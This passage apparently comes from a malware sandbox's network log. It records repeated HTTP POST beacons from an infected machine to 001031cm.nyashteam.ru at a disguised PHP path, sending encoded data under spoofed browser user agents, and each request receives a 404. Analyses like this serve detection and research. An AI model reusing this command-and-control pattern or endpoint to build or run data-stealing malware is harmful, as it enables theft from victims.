                                                            Content-Length: 344
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 28, 2024 23:47:50.678116083 CET344OUTData Raw: 05 02 01 06 03 0a 04 05 05 06 02 01 02 00 01 06 00 05 05 08 02 05 03 00 02 06 0a 03 07 04 06 09 0d 52 04 0a 00 06 03 07 0c 06 04 04 00 06 02 03 05 03 0c 0f 0f 02 06 51 01 0e 07 01 05 00 05 5d 05 0b 0c 09 06 02 04 07 0d 03 0e 52 0d 06 0f 02 05 03
                                                            Data Ascii: RQ]R\L}RkpvNtL}uuRB~ofXcRc]kc`loHxY~h~Qwtw\i_~V@{mnA}bW
                                                            Dec 28, 2024 23:47:51.346797943 CET25INHTTP/1.1 100 Continue
                                                            Dec 28, 2024 23:47:51.580703020 CET1024INHTTP/1.1 404 Not Found
                                                            Date: Sat, 28 Dec 2024 22:47:51 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r163hsmlEZ0DX9Zg85zDYkLN8MPQflsDvA6LsGla8hiOpdvo69gTkAqMWBrL4Gf2Z2Nrqom%2FJPRMbyowkU0oJNt%2BItVRwN876mPghGvSZiqlUYva3XL02PaNdQzUYMZDaby7psXMBok%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f951830ffe342ea-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4694&min_rtt=1732&rtt_var=6574&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=693&delivery_rate=57410&cwnd=142&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1192.168.2.449737172.67.186.20080
                                                            TimestampBytes transferredDirectionData
                                                            Dec 28, 2024 23:47:59.986454964 CET349OUTPOST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 001031cm.nyashteam.ru
                                                            Content-Length: 344
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 28, 2024 23:48:00.333673954 CET344OUTData Raw: 00 01 01 06 03 0a 01 07 05 06 02 01 02 01 01 00 00 04 05 0a 02 00 03 01 01 04 0f 54 05 0e 02 50 0e 56 06 00 00 0c 04 51 0e 50 07 56 05 51 06 02 04 50 0f 0b 0f 52 05 00 04 07 05 01 01 0b 04 0e 05 03 0d 5c 00 0e 04 03 0b 00 0c 57 0e 00 0d 09 04 02
                                                            Data Ascii: TPVQPVQPR\WP\L~NbtrqLufoUUyclp|Zs^oBgK{cb|mZtgU_e~V@xCTO~r[
                                                            Dec 28, 2024 23:48:01.071428061 CET25INHTTP/1.1 100 Continue
                                                            Dec 28, 2024 23:48:01.308924913 CET1024INHTTP/1.1 404 Not Found
                                                            Date: Sat, 28 Dec 2024 22:48:01 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4Sxd7UxESLVQU%2B%2Fajx2WtV0H3HNTu3lLUYP3RZRf1zEmWDBo1vP65xh5ys44UQjslgljhtGx56JS2BJhAlqMxP96g8r4EuJsSN2v6CkUG7ZwyoZGap68SnXLtvbPkpyJQLpexFKBYXM%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f95186dbe2d1a30-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4254&min_rtt=1995&rtt_var=5267&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=693&delivery_rate=72745&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            2192.168.2.449739172.67.186.20080
                                                            TimestampBytes transferredDirectionData
                                                            Dec 28, 2024 23:48:05.014668941 CET349OUTPOST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 001031cm.nyashteam.ru
                                                            Content-Length: 344
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 28, 2024 23:48:05.364931107 CET344OUTData Raw: 00 01 01 06 03 0a 01 07 05 06 02 01 02 01 01 00 00 04 05 0a 02 00 03 01 01 04 0f 54 05 0e 02 50 0e 56 06 00 00 0c 04 51 0e 50 07 56 05 51 06 02 04 50 0f 0b 0f 52 05 00 04 07 05 01 01 0b 04 0e 05 03 0d 5c 00 0e 04 03 0b 00 0c 57 0e 00 0d 09 04 02
                                                            Data Ascii: TPVQPVQPR\WP\L~NbtrqLufoUUyclp|Zs^oBgK{cb|mZtgU_e~V@xCTO~r[
                                                            Dec 28, 2024 23:48:06.191646099 CET25INHTTP/1.1 100 Continue
                                                            Dec 28, 2024 23:48:06.443243027 CET1028INHTTP/1.1 404 Not Found
                                                            Date: Sat, 28 Dec 2024 22:48:06 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1Fmcb0Cu8ZrZiRo6MvH5KXF%2FurRZ6uhspH8QePOTJNnmiB5dIb0iRBb9QlqTodKCoPgiRdOZzq%2Fqh7J1l1Z8%2BNQhKqfytiMTxEB8OmvigqSi7A0Qbitx5ah35X7GF%2F1XgH86Esm5Les%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f95188dac14423b-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3833&min_rtt=1775&rtt_var=4782&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=693&delivery_rate=80039&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            3192.168.2.449746172.67.186.20080
                                                            TimestampBytes transferredDirectionData
                                                            Dec 28, 2024 23:48:08.643814087 CET349OUTPOST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                            Host: 001031cm.nyashteam.ru
                                                            Content-Length: 336
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 28, 2024 23:48:08.990158081 CET336OUTData Raw: 05 00 04 0d 03 0b 01 06 05 06 02 01 02 05 01 0b 00 02 05 0f 02 00 03 0f 00 04 0f 54 05 05 01 55 0a 06 03 01 02 0c 04 56 0b 04 07 0a 07 0a 05 0f 06 53 0b 0a 0e 02 07 04 04 0f 05 01 07 0a 06 0d 00 03 0f 5c 00 07 04 05 0b 00 0b 02 0d 0c 0c 56 04 07
                                                            Data Ascii: TUVS\V\\QT\L}Qsi^cqiu[`hoawc]|cZDx|pXxNyX|}{P`^lLje~V@xmT~Oy
                                                            Dec 28, 2024 23:48:09.775778055 CET25INHTTP/1.1 100 Continue
                                                            Dec 28, 2024 23:48:10.018197060 CET1025INHTTP/1.1 404 Not Found
                                                            Date: Sat, 28 Dec 2024 22:48:09 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3BdFEjGTtpmmF5qeUaD4dSKXHFck3CDxJpX0HaVTT6ckf5TnrFD7uk9zfL6Ion3DiOR9u8Vf%2Bf5LedgO54uhNwVC8CZZZkSgbdvK66Ei9IUWYojyPwB04OsOX0Zd3lElj7njj6IG%2FDE%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f9518a41f50c33b-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2920&min_rtt=1565&rtt_var=3297&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=685&delivery_rate=117675&cwnd=170&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            4192.168.2.449757172.67.186.20080
                                                            TimestampBytes transferredDirectionData
                                                            Dec 28, 2024 23:48:12.392735958 CET366OUTPOST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                            Host: 001031cm.nyashteam.ru
                                                            Content-Length: 344
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 28, 2024 23:48:12.744767904 CET344OUTData Raw: 00 02 01 02 06 0a 01 04 05 06 02 01 02 00 01 05 00 06 05 09 02 05 03 00 00 01 0d 01 04 50 01 54 0f 51 06 59 00 0d 06 05 0f 00 07 07 07 03 05 0e 05 0a 0c 5e 0c 03 05 52 01 05 04 00 05 00 00 0e 05 02 0e 09 04 03 07 01 0e 07 0e 03 0d 51 0c 08 07 06
                                                            Data Ascii: PTQY^RQ\L}RksjO`Lau[ZOhBuOtl`|sxKoo^P|}^@vt|O~_~V@{SbN}bW
                                                            Dec 28, 2024 23:48:13.569377899 CET25INHTTP/1.1 100 Continue
                                                            Dec 28, 2024 23:48:13.823133945 CET1030INHTTP/1.1 404 Not Found
                                                            Date: Sat, 28 Dec 2024 22:48:13 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d54nnMoyjxclELRnw72Vhogz2H%2BEZ9IwFpds0%2BTmCEdcPAiNyd9ba3EWDyJu1wqDuCplGzhH4Ju5MX1w4TQqmmQg%2BvMn2GBHOI5RKY7cnYEQqb73GXvnGNNVjznuDDZ9%2Bk%2Bh7y6MyPI%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f9518bbcb208cba-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3733&min_rtt=1971&rtt_var=4264&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=710&delivery_rate=90852&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            5192.168.2.449768172.67.186.20080
                                                            TimestampBytes transferredDirectionData
                                                            Dec 28, 2024 23:48:17.129587889 CET349OUTPOST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 001031cm.nyashteam.ru
                                                            Content-Length: 344
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 28, 2024 23:48:17.476095915 CET344OUTData Raw: 00 04 01 06 06 0b 01 07 05 06 02 01 02 01 01 06 00 0b 05 08 02 06 03 0b 00 04 0d 03 05 07 01 02 0d 55 05 0c 02 0c 04 06 0d 02 05 51 05 05 07 05 04 06 0f 0e 0f 52 06 07 05 07 04 02 01 03 06 0d 03 0b 0d 0c 06 0f 04 01 0b 03 0e 07 0d 02 0f 51 04 00
                                                            Data Ascii: UQRQR]WRQQ\L}Pkcvc[r_u[kQ~lS`h`k^l{xcfJ}}xwl~e~V@{mPA}\}
                                                            Dec 28, 2024 23:48:18.263000965 CET25INHTTP/1.1 100 Continue
                                                            Dec 28, 2024 23:48:18.505753994 CET1028INHTTP/1.1 404 Not Found
                                                            Date: Sat, 28 Dec 2024 22:48:18 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5tcy1f9wSve3aZE0AU97eF5%2BAqUnNSW1P8p0%2FfWF1besIL6DHwdxNHSOBZhEgpAMgIXH3tZy8GERQ%2FGo29ZgP5OIsaFgPrx9WDxR0Qx15RiFRDoEQqyMf%2FgaYkbg3h8xU6L2VLzvQgc%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f9518d92c22efa5-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4954&min_rtt=1976&rtt_var=6697&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=693&delivery_rate=56584&cwnd=199&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            6192.168.2.449773172.67.186.20080
                                                            TimestampBytes transferredDirectionData
                                                            Dec 28, 2024 23:48:20.338089943 CET366OUTPOST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                            Host: 001031cm.nyashteam.ru
                                                            Content-Length: 344
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 28, 2024 23:48:20.693634033 CET344OUTData Raw: 00 0b 04 07 03 0f 01 04 05 06 02 01 02 0c 01 01 00 02 05 0c 02 06 03 0f 02 05 0d 57 04 52 03 57 0e 0f 03 01 03 0c 07 01 0c 0b 06 02 00 04 07 54 07 03 0d 01 0a 05 06 56 04 01 05 01 01 05 05 0a 02 54 0a 09 04 03 04 03 0e 54 0b 05 0d 02 0c 03 07 50
                                                            Data Ascii: WRWTVTTPUP\L}S^zt\}vKThRvYvl`O~ptK{Rox^~kSZN`gk[u~V@xSr}\S
                                                            Dec 28, 2024 23:48:21.422271013 CET25INHTTP/1.1 100 Continue
                                                            Dec 28, 2024 23:48:21.657381058 CET1026INHTTP/1.1 404 Not Found
                                                            Date: Sat, 28 Dec 2024 22:48:21 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8GsxJOGs%2BCR%2FxTCB3GfY931Rifo9vdTLvppvhuFRwBu1TR8g6Oir0HFSe9BjUOgacG08dXUmBuhgLaZoAwgW9yRg6wyZOXUUNcD9OzwxJFoL5tC3dV15Tc%2FL30Rf42CsOST3pYoRj5U%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f9518ece9310c9e-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3008&min_rtt=1590&rtt_var=3432&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=710&delivery_rate=112880&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            7192.168.2.449825172.67.186.20080
                                                            TimestampBytes transferredDirectionData
                                                            Dec 28, 2024 23:48:43.523001909 CET349OUTPOST /pythonProcessdefaultWordpressdatalifetempcdnDownloads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 001031cm.nyashteam.ru
                                                            Content-Length: 344
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 28, 2024 23:48:43.881140947 CET344OUTData Raw: 00 04 04 03 06 00 04 06 05 06 02 01 02 02 01 04 00 0b 05 0d 02 0c 03 09 03 07 0a 07 03 07 06 06 0a 06 05 0a 00 03 04 0a 0b 02 02 05 07 51 05 01 04 07 0f 01 0d 52 01 02 06 54 03 01 05 04 05 5f 03 01 0a 0e 05 55 06 06 0e 05 0e 02 0f 51 0e 51 05 0c
                                                            Data Ascii: QRT_UQQVU\L}Ssvcr}aShozYwR|LhZXxlsE{sfIhTlvt|}u~V@{CPru
                                                            Dec 28, 2024 23:48:44.618026972 CET25INHTTP/1.1 100 Continue
                                                            Dec 28, 2024 23:48:44.855725050 CET1021INHTTP/1.1 404 Not Found
                                                            Date: Sat, 28 Dec 2024 22:48:44 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z8V%2BwyF1uA5Yp72w8ewnVsedizpmiGLnEvK%2FBKH5BPQWjbDNZN0BUIolEGWY7jR1K8m0H0UrycQvbnBI6uSEnXtUS%2FvO0bW2l21s2kGsSsNTXJvnRPAc60I8auJcij1NG24W2G8SJsw%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f95197ded68efa7-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=6728&min_rtt=4296&rtt_var=6476&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=693&delivery_rate=61450&cwnd=160&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                            Dec 28, 2024 23:48:45.047370911 CET5INData Raw: 30 0d 0a 0d 0a
